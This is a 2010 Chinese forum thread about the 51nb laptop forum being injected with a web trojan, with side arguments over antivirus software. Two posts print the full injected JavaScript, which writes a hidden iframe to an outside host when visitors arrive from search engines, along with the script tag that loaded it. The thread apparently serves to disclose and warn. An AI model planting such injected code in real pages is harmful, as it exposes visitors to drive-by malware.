duogood 发表于 2010-6-24 10:00

51nb 被挂马了,怎么几天没人管呢? [图]

51nb 被挂马了,怎么几天没人管呢? 应该也有很多黑友发现吧!

13236608421 发表于 2010-6-24 10:02

木马代码见 http://www.ibmnb.com/post.php?action=edit&extra=page%3D1&editsubmit=yes&mod=


奇怪 我把论坛的病毒代码发布出来的帖子被删除啦

[ Edited by13236608421 on 2010-6-24 10:33 ]

nextwang 发表于 2010-6-24 10:06

Posted by 13236608421 on 2010-6-24 10:02 http://www.ibmnb.com/images/common/back.gif
木马代码见 http://www.ibmnb.com/post.php?action=edit&extra=page%3D1&editsubmit=yes&mod=

已删,谢谢提醒。

Brance 发表于 2010-6-24 10:11

还是没有解决

phantomsea 发表于 2010-6-24 10:13

卡巴斯基2010没有报马

jarodpeach 发表于 2010-6-24 10:14

竟然还有用360的

duogood 发表于 2010-6-24 10:19

Posted by jarodpeach on 2010-6-24 10:14 http://www.ibmnb.com/images/common/back.gif
竟然还有用360的
大部分人还是在用的,而且不光是360报啊,TT也报啊

lyl886868 发表于 2010-6-24 10:21

360也敢用,唉.........................

13236608421 发表于 2010-6-24 10:23

Posted by phantomsea on 2010-6-24 10:13 http://www.ibmnb.com/images/common/back.gif
卡巴斯基2010没有报马

那就赶快卸载掉吧
病毒代码我都写写出来了 这种杀毒软件还敢用?

无星之夜 发表于 2010-6-24 10:24

卡巴2010没有出现问题。

13236608421 发表于 2010-6-24 10:24

Posted by jarodpeach on 2010-6-24 10:14 http://www.ibmnb.com/images/common/back.gif
竟然还有用360的

论坛有病毒代码 咋还怪上安全软件啦?

莫非病人有病都是因为有了医生?

8610 发表于 2010-6-24 10:24

哇!!!

腾讯。。。。360。。。 鲁大师 。。。


瞎了我的狗眼!!!

jarodpeach 发表于 2010-6-24 10:26

回复 #11 13236608421 的帖子

360自己就是个病毒

penghp 发表于 2010-6-24 10:26

Posted by 13236608421 on 2010-6-24 10:24 http://www.ibmnb.com/images/common/back.gif


论坛有病毒代码 咋还怪上安全软件啦?

莫非病人有病都是因为有了医生?
---------------
很多人,思维被固定了,媚外得很,莫怪莫怪:D

jarodpeach 发表于 2010-6-24 10:26

回复 #11 13236608421 的帖子

我只看到指定的主题不存在或已被删除或正在被审核,请返回。

alanfly 发表于 2010-6-24 10:38

昨天的主题也被删除了,论坛方面不出来解释只是删帖不是解决之策。

13236608421 发表于 2010-6-24 10:40

Posted by jarodpeach on 2010-6-24 10:26 http://www.ibmnb.com/images/common/back.gif
360自己就是个病毒

防病毒工具本来就都是跟病毒一样的程序

就像JC跟流氓在多数指标上是完全一样的

13236608421 发表于 2010-6-24 10:41

Posted by jarodpeach on 2010-6-24 10:26 http://www.ibmnb.com/images/common/back.gif
我只看到指定的主题不存在或已被删除或正在被审核,请返回。

为了广告收入出卖注册会员

wslpc 发表于 2010-6-24 10:41

Posted by 8610 on 2010-6-24 10:24 http://www.ibmnb.com/images/common/back.gif
哇!!!

腾讯。。。。360。。。 鲁大师 。。。


瞎了我的狗眼!!!
排这个,哈哈

13236608421 发表于 2010-6-24 10:41

Posted by alanfly on 2010-6-24 10:38 http://www.ibmnb.com/images/common/back.gif
昨天的主题也被删除了,论坛方面不出来解释只是删帖不是解决之策。

问题是 删除帖子不给理由

jarodpeach 发表于 2010-6-24 10:43

回复 #20 13236608421 的帖子

我不关心理由,只关心代码是怎么写的,危害有多严重

6000lq 发表于 2010-6-24 10:46

说真的,我一直看不上360,不是因为它不好,而是因为做它的人是周总,这个人的人品真的不咋的,从3721到YAHOO,我是不敢用一个曾经的流氓做出来的东西

alanfly 发表于 2010-6-24 10:51

Posted by jarodpeach on 2010-6-24 10:43 http://thinkpad.cn/forum/images/common/back.gif
我不关心理由,只关心代码是怎么写的,危害有多严重
就是这个地址:http://union.7pk.com/tmp/51nb.gif?%A1%A7
代码如下:
var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".sogou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".soso.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".gougou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".118114.cn");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".bing.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".youdao.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".yahoo.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}

13236608421 发表于 2010-6-24 10:52

Posted by jarodpeach on 2010-6-24 10:43 http://www.ibmnb.com/images/common/back.gif
我不关心理由,只关心代码是怎么写的,危害有多严重

<script src=http://union.7pk.com/tmp/51nb.gif?¨></script>
放在标题下 关键字以前
明显是 代码权限完全优先于网站内容权限

按照本论坛某版主说是量子统计
那么常规统计代码都是放在页面最下方 而这个放在页面最上方

union.7pk.com 域名是 快车联盟 ,估计是 交换链接链接 或者赚钱同盟一类 具体安全否 看解析后





看到有各大搜索引擎的域名 莫非是seo优化代码?
如果这个代码确实有效我也加自己网站试试

安全性您自己看吧

8866.org 这个是动态域名解析的那个吧 希网 好像是 我也有一个在用 xitong.2288.org
工具google的那次 用的也似这个二级域名

var url=document.referrer;
var p=url.toLowerCase().indexOf(".baidu.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".google.com.hk");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".sogou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".soso.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".gougou.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".118114.cn");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".bing.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".youdao.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}
var url=document.referrer;
var p=url.toLowerCase().indexOf(".yahoo.com");
if (p>0)
{
document.writeln("<iframe src=http://microsoft45.8866.org:6677/g/index.html width=0 height=0></iframe>");
}

13236608421 发表于 2010-6-24 10:58

至少这个代码会增加 会员打开51nb网站的同时访问一堆彼得网站的流量
且代码次序看 属于 别人的网站优于51nb网站

如果是商业礼仪推荐吧这个代码挪到 输出页面的最下部 至少 对开启网页速度影响小点


至于是不是别有用心,因为这个代码的实际内容 是链接到别的网站.人家那边随意修改下执行代码,就可以做任何事情 因此会员 做好心理准备 该装杀毒的装杀毒 该申请密码保护的申请密码保护
该修改网银密码的修改网银密码 该挂失的挂失
别到时候 一扎眼几百万没啦 哭都没地方哭

发表于 2010-6-24 11:42

好怕怕的,专门网又不能不上,用证书或者动态密码有问题没?

wlsswj 发表于 2010-6-24 14:16

昨天,今天进来,都有瑞星拦截.(大规模爆发性网马群 V)

13236608421 发表于 2010-6-24 15:03

代码已经清理掉啦
但是谁对修改我头像的人 负责?
页: [1]
查看完整版本: 51nb 被挂马了,怎么几天没人管呢? [图]